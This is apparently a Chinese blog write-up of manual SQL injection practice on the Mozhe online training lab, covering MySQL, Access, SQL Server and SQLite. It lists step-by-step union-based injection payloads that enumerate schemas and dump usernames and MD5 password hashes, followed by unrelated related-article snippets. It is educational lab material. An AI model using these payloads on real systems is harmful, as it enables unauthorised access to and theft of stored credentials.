yujian404
yujian404

数据库注入漏洞线上靶场练习(mozhe)

今天练习了墨者的线上数据库漏洞手工注入(别问为什么,问就是简单,我可以做)。注:没有钱所以只做了几个,有钱的可以全部做完。

在你们去练习的前面我需要普及一些关于数据库的知识:第一点 数据库分为关系数据库和非关系数据库,两者代表(在我的印象里面的代表)关系型.Oracle,mysql,sqlserver,Access 非关系.MongoDB。两者的主要区别就是:https://blog.csdn.net/aaronthon/article/details/81714528。

练习的类型是关系型,非关系需要币。关系型的MySQL,SqlServer,Access,SQLite。

(漏洞在公告链接)

MySQL是最常见的数据库,一:通常使用单引号,and 1=1,1=2,来判断漏洞。(不要用常规的'来隔断)

二·:接着使用order by 判断字段长度(4)

三:接着使用联合查询 and 1=2 union select 1,2,3,4 来判断第几位可以显示(2,3)

四:接着使用 and 1=2 union select 1,database(),3,4 显示数据库名称(mozhe_Discuz_StormGroup)

五:接着使用联合查询 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 显示表名(StormGroup_member,notice:应该是第一个)。

六:接着使用and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member' 显示列名(id,name,password,status)显然用到name,password。

七:接着使用and 1=2 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member(mozhe,密码有两个所以要用第二个:356f589a7df439f6f744ff19bb8092c0,b528804bdea16273bb3758cc254bf610。MD5加密(因为有32位和常见加密)解密网站:https://www.somd5.com/)

ok最后就是提交flag。

接着就是Access数据库

首先和一,二一样判断字段长

三:接着联合查询显示第几位显示就不可以了,因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名 and exists(select * from admin) 。这个是真np,常用的就是admin,manage。实在不行砸门用sqlmap破一下(使用sqlmap字典中的名称去试比手工快,名称更完全)后面工作可以靠sqlmap,对于我们来说还是学习手工比较好。(admin)

四:接着就可以使用联合查询语句了and 1=2 union select 1,2,3,4 from admin 显示(2,3)

五:然后又tm猜字段名称一般有猜测字段有id ,name ,username,user_name,pwd,password,passwd。and exists(select username from admin),页面返回正常。淦感觉这个需要使用工具。

六:使用联合查询语句 and 1=2 union select 1,username,passwd, 4 from admin (moke,7e6ec4fadf84938f) MD5  解密

ok提交flag(发现是access建议使用sqlmap)

SqlServer数据库

首先与一,二一样

三:使用and 1=2 union select 1,2,3,4 不行。np禁止了,那不行啊又盲猜卖,建议使用sqlmap。但是不符合砸门的想法呀。所以砸门使用 -2 and 1=3 union all select null,null,null,null。发现可以。然后逐渐改位子找到现实位子(2,3,3为字符)

四:使用-2 union all select null,db_name(),null,null 找到数据库名称(mozhe_db_v2)

五:使用 -2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null (xtype='u' 查表 manage)查有其他表不  -2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null (announcement)。

六:使用-2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null 查列名(id) -2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null (username) 后面还有(password)

七:查看列中的东西 -2 union all select null,username, null,null from manage(admin_mz) -2 union all select null, password,null ,null from manage(72e1bfc3f01b7583)MD5

ok提交flag

SQLite数据库

首先和一二三一样。可以看见现实为(2,3)

四:这里需要看一个SQLite有一个隐藏表为sqlite_master 表里面的列字段为 type,name,tbl_name,rootpage,sql。

五:使用and 1=3 union select 1,tbl_name,sql,4 from sqlite_master 。(WSTMart_reg,name,password)

六: and 1=3 union select 1,name,password,4 from WSTMart_reg。最后md5解码。

ok 提交flag

 

总结sqlmap真好。

 

 

 

你可能感兴趣的:(数据库注入漏洞线上靶场练习(mozhe))

  • SQL必知必会40-SQLite:为什么微信用SQLite存储聊天记录? 程序员zhi路 MYSQL专栏sqlsqlitejvm
    我在上一篇文章中讲了WebSQL,当我们在Chrome、Safari和Firefox等浏览器客户端中使用WebSQL时,会直接操作SQLite。实际上SQLite本身是一个嵌入式的开源数据库引擎,大小只有3M左右,可以将整个SQLite嵌入到应用中,而不用采用传统的客户端/服务器(Client/Server)的架构。这样做的好处就是非常轻便,在许多智能设备和应用中都可以使用SQLite,比如微信就
  • Android Dagger2 框架注入模块源码深度剖析(四) &有梦想的咸鱼& android
    一、引言在Android开发中,依赖注入(DependencyInjection,简称DI)是一种重要的设计模式,它能够有效降低代码之间的耦合度,提高代码的可测试性和可维护性。Dagger2作为一款强大的依赖注入框架,在编译时生成依赖注入代码,避免了运行时反射带来的性能开销。注入模块是Dagger2的核心部分,负责将依赖对象注入到目标对象中。本文将深入分析Dagger2框架的注入模块,从源码级别详
  • 两会聚焦科技金融创新,赛逸展2025成重要实践平台 赛逸展张胜 科技金融
    在今年两会的热烈讨论中,科技金融创新成为核心议题之一,引发各界高度关注。国家对于科技金融的重视达到新高度,一系列旨在推动科技创新与金融深度融合的政策呼之欲出,力求为硬科技企业的成长注入强劲动力。会议期间,中国人民银行行长潘功胜透露,人民银行正携手证监会、科技部等部门,全力筹备在债券市场推出“科技板”。这一举措旨在通过创新金融工具,为科技型企业开辟更为便捷的融资渠道。通过完善发行交易制度,创新风险分
  • Mybatis的基本使用 学c真好玩 mybatis
    MyBatis简介MyBatis用于持久层框架,持久层是对数据库操作的部分,前版本iBatis由Apache软件基金组织进行更名并维护。特点:简化数据库的操作SQL映射灵活(半ORM框架)支持高级映射易于集成维护配置动态SQL缓存机制功能:替代JDBC,JDBC是java中提供的用于操作数据库的技术及方案数据库的连接控制难。连接池SQL语句硬编码。将sql语句存放到xml配置文件中参数传递问题。提
  • html5使用本地sqlite数据库 小祁爱编程 sqlitehtml5bigdata
    html5使用本地sqlite数据库本地数据库概述在HTML5中,大大丰富了客户端本地可以存储的内容,添加了很多功能将原本必须要保存在服务器上的数据转为保存在客户端本地,从而大大提高了Web应用程序性能,减轻了服务器的负担,使用Web时代重新回到了“客户端为重、服务器端为轻”的时代。HTML5中内置了两种本地数据库,一种是SQLite,一种是indexedDBSQLite数据库使用操作本地数据库的
  • VSCode 2025最新后端开发必备插件汇总(必备插件合集,Python、Java、Go等语言) Code_流苏 实用软件与高效工具vscodepythonjava后端开发必备插件合集
    前言:作为微软推出的轻量级跨平台编辑器,VSCode凭借智能代码补全、远程开发、Git集成等核心功能,已成为后端开发者首选工具。其强大的插件生态更是覆盖了主流后端语言支持、代码质量优化、性能分析等全场景需求。名人说:博观而约取,厚积而薄发。——苏轼《稼说送张琥》创作者:Code_流苏(CSDN)(一个喜欢古诗词和编程的Coder)目录一、语言支持类插件二、代码质量和格式化工具三、数据库工具四、AP
  • Mysql 主从复制架构 百里自来卷 mysql架构数据库
    MySQL主从复制(Master-SlaveReplication)是一种常见的数据库架构,广泛用于提高数据库的可扩展性、读写分离以及数据备份和容灾恢复。主从复制架构中,一个MySQL实例作为主库(Master),负责处理所有的写操作,而一个或多个从库(Slave)从主库复制数据,并负责处理读操作。主库(Master):主库负责处理数据库的所有写操作(如INSERT、UPDATE和DELETE),
  • ERROR 2061 (HY000): Authentication plugin ‘caching_sha2_password‘ reported error: Authentication 喝醉酒的小白 MySQLmysqljava数据库
    错误信息“ERROR2061(HY000):Authenticationplugin‘caching_sha2_password’reportederror:Authenticationrequiressecureconnection.”表示MySQL数据库配置了caching_sha2_password认证插件,并要求使用安全连接来进行身份验证。该错误通常出现在以下情况下:使用的MySQL客户端
  • 如何进行OceanBase 运维工具的部署和表性能优化 oceanbase
    随着OceanBase数据库应用的日益深入,数据量不断攀升,单个表中存储数百万乃至数千万条数据的情况变得愈发普遍。因此,部署专门的运维工具、实施针对性的表性能优化策略,以及加强指标监测工作,都变得更为重要。以下为基于我们的使用场景,所采取的一些部署和优化措施分享。一、OCP部署升级1.OCP升级(1)4.2.1BP1升级到4.2.2,本来以为毫无波澜但是下载完毕一键包并完成前期准备工作启动后发现无
  • 2025年2月中国数据库排行榜:OceanBase迎来开门红,金仓、GBASE排名节节高
    2025年2月,中国数据库流行度排行榜正式发布。在春节之际,DeepSeek凭借突破性的技术成功出圈,而在此前,各大数据库厂商便已开始探索AI与数据库的深度融合,并陆续推出了相关产品和功能。相信在这股技术革新的浪潮下,将涌现越来越多的新产品和解决方案。接下来,我们将逐一盘点各大数据库的最新动态,探索未来的潜力与挑战。一、金仓、GBASE排名再攀升,TDSQL升第九与上月相比,榜单前十的位次出现了细
  • 【MySQL基础-3】SQL语言详解:定义、分类、注意事项与注释 AllenBright #MySQLmysqlsql
    SQL(StructuredQueryLanguage,结构化查询语言)是用于管理和操作关系型数据库的标准编程语言。无论是查询数据、插入新记录、更新数据还是删除数据,SQL都是与数据库交互的核心工具。本文将深入探讨SQL语言的定义、分类、注意事项以及注释的使用,帮助你全面掌握这一强大的数据库操作语言。1.什么是SQL语言?SQL是一种专门用于管理关系型数据库的编程语言。它允许用户执行以下操作:查询
  • 【赵渝强老师】达梦数据库的目录结构 数据库关系型数据库
    达梦数据库安装成功后,通过使用Linux的tree命令可以非常方便地查看DM8的目录结构。tree-L1-d/home/dmdba/dmdbms#输出的信息如下:/home/dmdba/dmdbms├──bin存放DM数据库的可执行文件,例如disql命令等。├──bin2├──data数据库实例目录,该目录存放各个实例的文件。├──desktop存放DM数据库各个工具的桌面图标。├──doc存放
  • 工程化与框架系列(31)--前端依赖管理实践 一进制ᅟᅠ        ‌‍‎‏  前端工程化与框架前端
    前端依赖管理实践引言前端依赖管理是现代Web开发中的重要环节。本文将深入探讨前端依赖管理的最佳实践,包括包管理工具、版本控制、依赖分析和优化等方面,帮助开发者更好地管理项目依赖。依赖管理概述前端依赖管理主要包括以下方面:包管理工具:npm、yarn、pnpm等版本控制:语义化版本、锁文件等依赖分析:依赖树、循环依赖等依赖优化:体积优化、重复依赖等安全管理:漏洞检测、更新维护等依赖管理工具实现依赖分
  • 【MYSQL学习】MySQL索引:删除索引的5大绝招你GET到了吗? 墨瑾轩 MySql入门~精通mysql学习数据库
    关注墨瑾轩,带你探索编程的奥秘!超萌技术攻略,轻松晋级编程高手技术宝库已备好,就等你来挖掘订阅墨瑾轩,智趣学习不孤单即刻启航,编程之旅更有趣MySQL索引:删除索引的5大绝招你GET到了吗?引言❓在数据库操作中,索引是一个非常重要的概念。合理的索引设计可以显著提高查询性能,而不合理的索引则可能导致性能下降。但你知道如何有效地删除索引吗?今天,我们就来一场深入浅出的探索之旅,带你了解删除索引的5大绝
  • 热修复框架Tinker与Robust原理剖析 Ya-Jun android
    热修复框架Tinker与Robust原理剖析一、热修复技术概述1.1什么是热修复热修复(HotFix)是Android平台上的一种动态修复机制,它允许应用在不重新发布版本的情况下,动态修复线上bug。这种技术对于快速修复线上问题、降低用户流失率具有重要意义。1.2热修复的应用场景紧急bug修复功能动态更新A/B测试动态功能控制1.3主流热修复方案对比方案优点缺点适用场景Tinker支持全量更新、性
  • 【QT教程】QT6硬件数据库编程 QT硬件数据库 QT性能优化QT原理源码QT界面美化 qtqt6.3qt5c++QT教程
    QT6硬件数据库编程使用AI技术辅助生成QT界面美化视频课程QT性能优化视频课程QT原理与源码分析视频课程QTQMLC++扩展开发视频课程免费QT视频课程您可以看免费1000+个QT技术视频免费QT视频课程QT统计图和QT数据可视化视频免费看免费QT视频课程QT性能优化视频免费看免费QT视频课程QT界面美化视频免费看1QT6硬件数据库编程基础1.1QT6数据库引擎概述1.1.1QT6数据库引擎概述
  • MySQL 的索引数量是否越多越好 Zero_pl Mysql基础知识面试题mysql数据库
    MySQL的索引并不是越多越好,索引数量需要根据查询需求合理设置。虽然索引可以提高查询效率,但过多的索引也会带来额外的开销,影响数据库的性能。✅索引的优点提高查询速度索引类似于书籍的目录,可以快速查找数据,减少查询时间。如SELECT*FROMusersWHEREemail='[email protected]';,如果email字段有索引,MySQL可以直接找到匹配数据,否则需要全表扫描。加速排序(
  • MyBatis底层原理深度解析:动态代理与注解如何实现ORM映射 rider189 java开发语言mybatis
    一、引言MyBatis作为一款优秀的ORM框架,其核心设计思想是通过动态代理和注解将接口方法与SQL操作解耦。开发者只需定义Mapper接口并添加注解,便能实现数据库操作,这背后隐藏着精妙的动态代理机制与源码设计。本文将从源码层解析MyBatis如何实现这一过程。二、动态代理机制:从接口到实现类关键点:MyBatis通过JDK动态代理为Mapper接口生成代理对象,拦截所有方法调用,将其路由到SQ
  • SQLMesh 系列教程:解锁SQLMesh的宏与变量魔法 梦想画家 #python数据分析工程sqlmesh数据工程分析工程
    在数据库流水线开发中,代码复用与动态配置是提升效率的核心诉求。SQLMesh以其独特的宏系统与用户定义变量机制,重新定义了SQL生成的灵活性。与传统模板引擎不同,SQLMesh的宏并非简单的字符串替换,而是基于语义理解的智能代码重构——通过sqlglot库解析SQL结构,结合Python逻辑处理能力,让用户能够以声明式语法实现复杂查询的动态组装。引言无论是全局配置、网关级参数还是模型内局部变量,S
  • 从零实现OSS阿里云图片上传:前端采用的vue3+element-plus,后端采用javaspingboot,实现上传图片到云,然后存储数据库链接能够回显的效果 绝顶少年 阿里云前端数据库
    后端(JavaSpringBoot)1.添加依赖在pom.xml中添加必要的依赖,包括阿里云OSSSDK、SpringBootWeb、MyBatis-Plus等:org.springframework.bootspring-boot-starter-webcom.baomidoumybatis-plus-boot-starter3.4.3.4com.aliyun.ossaliyun-sdk-oss
  • Redis五种用途 egekm_sefg 面试学习路线阿里巴巴redis数据库缓存
    简介Redis是一个高性能的key-value数据库。Redis与其他key-value缓存产品有以下三个特点:-Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。-Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储。-Redis支持数据的备份,即master-slave模式的数据备份。五
  • 软件架构师--Redis常见问题 一蓑烟雨*任平生 软件架构师redis数据库缓存
    一、缓存雪崩产生原因:大部分缓存失效—>数据库崩溃解决方案1.使用锁或队列保证不会有大量的线程对数据库一次性进行读写,从而避免失效时大量的并发请求落到底层存储系统上(对数据库限流)。2.为key设置不同的缓存失效时间在固定的一个缓存时间的基础上+随机一个时间作为缓存失效时间,避免大量数据同时失效。3.二级缓存设置一个有时间限制的缓存+一个无时间限制的缓存,避免大规模访问数据库。二、缓存穿透产生原因
  • 软件架构师--数据库系统 一蓑烟雨*任平生 软件架构师数据库1024程序员节
    一、分布式数据库1.分片透明性分片透明性:分不分片,用户感受不到(不关心如何分片存储)。位置透明性:数据存放在哪里,用户不用管(用户无需知道数据存放的物理位置)复制透明性:不关心结点的复制情况。局部数据模型透明性(逻辑透明):用户或应用程序无需知道局部场地使用的是哪种数据模型。2.两阶段提交协议2PC2PC事务提交的两个阶段①表决阶段,目的是形成一个共同的决定②执行阶段,目的是实现这个协调者的决定
  • web渗透--14--目录遍历/文件包含测试 武天旭 web渗透web安全渗透测试OWASP安全测试
    1、漏洞描述文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果。主要包括本地文件包含和远程文件包含两种形式,由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特殊的功能代码文件中,然后包含文件中的代码
  • Redis的缓存雪崩、缓存击穿、缓存穿透与缓存预热、缓存降级 小二爱编程· 缓存redismybatis
    一、缓存雪崩:1、什么是缓存雪崩:如果缓在某一个时刻出现大规模的key失效,那么就会导致大量的请求打在了数据库上面,导致数据库压力巨大,如果在高并发的情况下,可能瞬间就会导致数据库宕机。这时候如果运维马上又重启数据库,马上又会有新的流量把数据库打死。这就是缓存雪崩。2、问题分析:造成缓存雪崩的关键在于同一时间的大规模的key失效,为什么会出现这个问题,主要有两种可能:第一种是Redis宕机,第二种
  • 2025年渗透测试面试题总结-安恒 (题目+回答) 独行soc 2025年渗透测试面试指南面试职场和发展安全web安全红蓝攻防
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录安恒1.sqlmap爆出当前数据库库名的参数是什么?2.nmap探测系统类型的参数是?3.nmap的小写-o和-A是做啥的?4.布尔盲注的具体语句是啥?5.宽字节原理6.Python是否存在反序列化漏洞?7.GET与POST传参的区别8.HTTP请求方式9.如何判断C
  • 今天项目中出现了一个xss漏洞 hello_simon phphtmlhacker
    代码是这样的:xxxx.com/en/index?siteId=">alert(document.cookie)smartyget没做过滤的,有点坑
  • 2025版最新如何参加护网行动?零基础入门到精通,收藏这篇就够了! 程序媛西米 网络安全web安全网络安全HVV护网行动网络安全计算机
    1.什么是护网行动护网行动是以公安部牵头的,用以评估企事业单位的网络安全的活动。具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。“护网行动”是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来
  • 24.pocsuite3:开源的远程漏洞测试框架 白帽少女安琪拉 安全工具网络安全网络
    一、项目介绍pocsuite3是一款由Knownsec404Team开发的开源远程漏洞测试框架,专注于快速验证和利用已知漏洞。其通过模块化设计和插件化架构,支持用户编写自定义POC(ProofofConcept),覆盖Web漏洞、系统漏洞、数据库漏洞等多种类型,适用于红队渗透、漏洞验证及安全研究等场景。1.1核心功能模块化设计:支持编写、加载和执行自定义POC,灵活适应不同场景。内置丰富的POC库
  • YashanDB UNDO表空间管理 数据库
    UNDO表空间用于YashanDB创建和管理回滚(撤销数据库更改)信息,这种信息包括交易行为的记录,且主要是在交易提交之前,统称为undo。undo记录用于:执行ROLLBACK语句回滚事务恢复数据库提供读取一致性使用闪回查询分析较早时间点的数据使用闪回功能从逻辑损坏中恢复设置最短撤销保留期YashanDB提供一种自动化的机制,称为自动撤销管理,用于管理undo信息和空间。当启用自动撤销管理时,始
  • 辗转相处求最大公约数 沐刃青蛟 C++漏洞
    无言面对”江东父老“了,接触编程一年了,今天发现还不会辗转相除法求最大公约数。惭愧惭愧!   为此,总结一下以方便日后忘了好查找。   1.输入要比较的两个数a,b   忽略:2.比较大小(因为后面要的是大的数对小的数做%操作)   3.辗转相除(用循环不停的取余,如a%b,直至b=0)   4.最后的a为两数的最大公约数 &
  • F5负载均衡会话保持技术及原理技术白皮书 bijian1013 F5负载均衡
    一.什么是会话保持?        在大多数电子商务的应用系统或者需要进行用户身份认证的在线系统中,一个客户与服务器经常经过好几次的交互过程才能完成一笔交易或者是一个请求的完成。由于这几次交互过程是密切相关的,服务器在进行这些交互过程的某一个交互步骤时,往往需要了解上一次交互过程的处理结果,或者上几步的交互过程结果,服务器进行下
  • Object.equals方法:重载还是覆盖 Cwind javagenericsoverrideoverload
    本文译自StackOverflow上对此问题的讨论。 原问题链接   在阅读Joshua Bloch的《Effective Java(第二版)》第8条“覆盖equals时请遵守通用约定”时对如下论述有疑问: “不要将equals声明中的Object对象替换为其他的类型。程序员编写出下面这样的equals方法并不鲜见,这会使程序员花上数个小时都搞不清它为什么不能正常工作:” pu
  • 初始线程 15700786134
          暑假学习的第一课是讲线程,任务是是界面上的一条线运动起来。            既然是在界面上,那必定得先有一个界面,所以第一步就是,自己的类继承JAVA中的JFrame,在新建的类中写一个界面,代码如下: public class ShapeFr
  • Linux的tcpdump 被触发 tcpdump
    用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支 持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通情况下,直
  • 安卓程序listview优化后还是卡顿 肆无忌惮_ ListView
    最近用eclipse开发一个安卓app,listview使用baseadapter,里面有一个ImageView和两个TextView。使用了Holder内部类进行优化了还是很卡顿。后来发现是图片资源的问题。把一张分辨率高的图片放在了drawable-mdpi文件夹下,当我在每个item中显示,他都要进行缩放,导致很卡顿。解决办法是把这个高分辨率图片放到drawable-xxhdpi下。 &nb
  • 扩展easyUI tab控件,添加加载遮罩效果 知了ing jquery
    (function () { $.extend($.fn.tabs.methods, { //显示遮罩 loading: function (jq, msg) { return jq.each(function () { var panel = $(this).tabs(&
  • gradle上传jar到nexus 矮蛋蛋 gradle
    原文地址: https://docs.gradle.org/current/userguide/maven_plugin.html configurations {     deployerJars } dependencies {     deployerJars "org.apache.maven.wagon
  • 千万条数据外网导入数据库的解决方案。 alleni123 sqlmysql
    从某网上爬了数千万的数据,存在文本中。 然后要导入mysql数据库。 悲剧的是数据库和我存数据的服务器不在一个内网里面。。 ping了一下, 19ms的延迟。 于是下面的代码是没用的。 ps = con.prepareStatement(sql); ps.setString(1, info.getYear())............; ps.exec
  • JAVA IO InputStreamReader和OutputStreamReader 百合不是茶 JAVA.io操作 字符流
    这是第三篇关于java.io的文章了,从开始对io的不了解-->熟悉--->模糊,是这几天来对文件操作中最大的感受,本来自己认为的熟悉了的,刚刚在回想起前面学的好像又不是很清晰了,模糊对我现在或许是最好的鼓励 我会更加的去学 加油!: JAVA的API提供了另外一种数据保存途径,使用字符流来保存的,字符流只能保存字符形式的流   字节流和字符的难点:a,怎么将读到的数据
  • MO、MT解读 bijian1013 GSM
    MO= Mobile originate,上行,即用户上发给SP的信息。MT= Mobile Terminate,下行,即SP端下发给用户的信息; 上行:mo提交短信到短信中心下行:mt短信中心向特定的用户转发短信,你的短信是这样的,你所提交的短信,投递的地址是短信中心。短信中心收到你的短信后,存储转发,转发的时候就会根据你填写的接收方号码寻找路由,下发。在彩信领域是一样的道理。下行业务:由SP
  • 五个JavaScript基础问题 bijian1013 JavaScriptcallapplythisHoisting
    下面是五个关于前端相关的基础问题,但却很能体现JavaScript的基本功底。 问题1:Scope作用范围 考虑下面的代码:  (function() { var a = b = 5; })(); console.log(b); 什么会被打印在控制台上?  回答:         上面的代码会打印 5。 &nbs
  • 【Thrift二】Thrift Hello World bit1129 Hello world
    本篇,不考虑细节问题和为什么,先照葫芦画瓢写一个Thrift版本的Hello World,了解Thrift RPC服务开发的基本流程   1. 在Intellij中创建一个Maven模块,加入对Thrift的依赖,同时还要加上slf4j依赖,如果不加slf4j依赖,在后面启动Thrift Server时会报错 <dependency>
  • 【Avro一】Avro入门 bit1129 入门
    本文的目的主要是总结下基于Avro Schema代码生成,然后进行序列化和反序列化开发的基本流程。需要指出的是,Avro并不要求一定得根据Schema文件生成代码,这对于动态类型语言很有用。   1. 添加Maven依赖   <?xml version="1.0" encoding="UTF-8"?> <proj
  • 安装nginx+ngx_lua支持WAF防护功能 ronin47
    需要的软件:LuaJIT-2.0.0.tar.gz                   nginx-1.4.4.tar.gz          &nb
  • java-5.查找最小的K个元素-使用最大堆 bylijinnan java
    import java.util.Arrays; import java.util.Random; public class MinKElement { /** * 5.最小的K个元素 * I would like to use MaxHeap. * using QuickSort is also OK */ public static void
  • TCP的TIME-WAIT bylijinnan socket
    原文连接: http://vincent.bernat.im/en/blog/2014-tcp-time-wait-state-linux.html 以下为对原文的阅读笔记 说明: 主动关闭的一方称为local end,被动关闭的一方称为remote end 本地IP、本地端口、远端IP、远端端口这一“四元组”称为quadruplet,也称为socket 1、TIME_WA
  • jquery ajax 序列化表单 coder_xpf Jquery ajax 序列化
       checkbox 如果不设定值,默认选中值为on;设定值之后,选中则为设定的值   <input type="checkbox" name="favor" id="favor" checked="checked"/> $("#favor&quo
  • Apache集群乱码和最高并发控制 cuisuqiang apachetomcat并发集群乱码
    都知道如果使用Http访问,那么在Connector中增加URIEncoding即可,其实使用AJP时也一样,增加useBodyEncodingForURI和URIEncoding即可。 最大连接数也是一样的,增加maxThreads属性即可,如下,配置如下: <Connector maxThreads="300" port="8019" prot
  • websocket dalan_123 websocket
    一、低延迟的客户端-服务器 和 服务器-客户端的连接 很多时候所谓的http的请求、响应的模式,都是客户端加载一个网页,直到用户在进行下一次点击的时候,什么都不会发生。并且所有的http的通信都是客户端控制的,这时候就需要用户的互动或定期轮训的,以便从服务器端加载新的数据。   通常采用的技术比如推送和comet(使用http长连接、无需安装浏览器安装插件的两种方式:基于ajax的长
  • 菜鸟分析网络执法官 dcj3sjt126com 网络
      最近在论坛上看到很多贴子在讨论网络执法官的问题。菜鸟我正好知道这回事情.人道"人之患好为人师" 手里忍不住,就写点东西吧. 我也很忙.又没有MM,又没有MONEY....晕倒有点跑题. OK,闲话少说,切如正题. 要了解网络执法官的原理. 就要先了解局域网的通信的原理. 前面我们看到了.在以太网上传输的都是具有以太网头的数据包. 
  • Android相对布局属性全集 dcj3sjt126com android
    RelativeLayout布局android:layout_marginTop="25dip" //顶部距离android:gravity="left" //空间布局位置android:layout_marginLeft="15dip //距离左边距 // 相对于给定ID控件android:layout_above 将该控件的底部置于给定ID的
  • Tomcat内存设置详解 eksliang jvmtomcattomcat内存设置
    Java内存溢出详解   一、常见的Java内存溢出有以下三种:   1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出JVM在启动的时候会自动设置JVM Heap的值,其初始空间(即-Xms)是物理内存的1/64,最大空间(-Xmx)不可超过物理内存。 可以利用JVM提
  • Java6 JVM参数选项 greatwqs javaHotSpotjvmjvm参数JVM Options
    Java 6 JVM参数选项大全(中文版)   作者:Ken Wu Email: [email protected] 转载本文档请注明原文链接 http://kenwublog.com/docs/java6-jvm-options-chinese-edition.htm!   本文是基于最新的SUN官方文档Java SE 6 Hotspot VM Opt
  • weblogic创建JMC i5land weblogicjms
    进入 weblogic控制太 1.创建持久化存储 --Services--Persistant Stores--new--Create FileStores--name随便起--target默认--Directory写入在本机建立的文件夹的路径--ok 2.创建JMS服务器 --Services--Messaging--JMS Servers--new--name随便起--Pers
  • 基于 DHT 网络的磁力链接和BT种子的搜索引擎架构 justjavac DHT
    上周开发了一个磁力链接和 BT 种子的搜索引擎 {Magnet & Torrent},本文简单介绍一下主要的系统功能和用到的技术。 系统包括几个独立的部分: 使用 Python 的 Scrapy 框架开发的网络爬虫,用来爬取磁力链接和种子; 使用 PHP CI 框架开发的简易网站; 搜索引擎目前直接使用的 MySQL,将来可以考虑使
  • sql添加、删除表中的列 macroli sql
    添加没有默认值:alter table Test add BazaarType char(1) 有默认值的添加列:alter table Test add BazaarType char(1) default(0) 删除没有默认值的列:alter table Test drop COLUMN BazaarType 删除有默认值的列:先删除约束(默认值)alter table Test DRO
  • PHP中二维数组的排序方法 abc123456789cba 排序二维数组PHP
    <?php/*** @package     BugFree* @version     $Id: FunctionsMain.inc.php,v 1.32 2005/09/24 11:38:37 wwccss Exp $*** Sort an two-dimension array by some level
  • hive优化之------控制hive任务中的map数和reduce数 superlxw1234 hivehive优化
    一、    控制hive任务中的map数: 1.    通常情况下,作业会通过input的目录产生一个或者多个map任务。 主要的决定因素有: input的文件总个数,input的文件大小,集群设置的文件块大小(目前为128M, 可在hive中通过set dfs.block.size;命令查看到,该参数不能自定义修改);2. 
  • Spring Boot 1.2.4 发布 wiselyman spring boot
    Spring Boot 1.2.4已于6.4日发布,repo.spring.io and Maven Central可以下载(推荐使用maven或者gradle构建下载)。   这是一个维护版本,包含了一些修复small number of fixes,建议所有的用户升级。   Spring Boot 1.3的第一个里程碑版本将在几天后发布,包含许多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他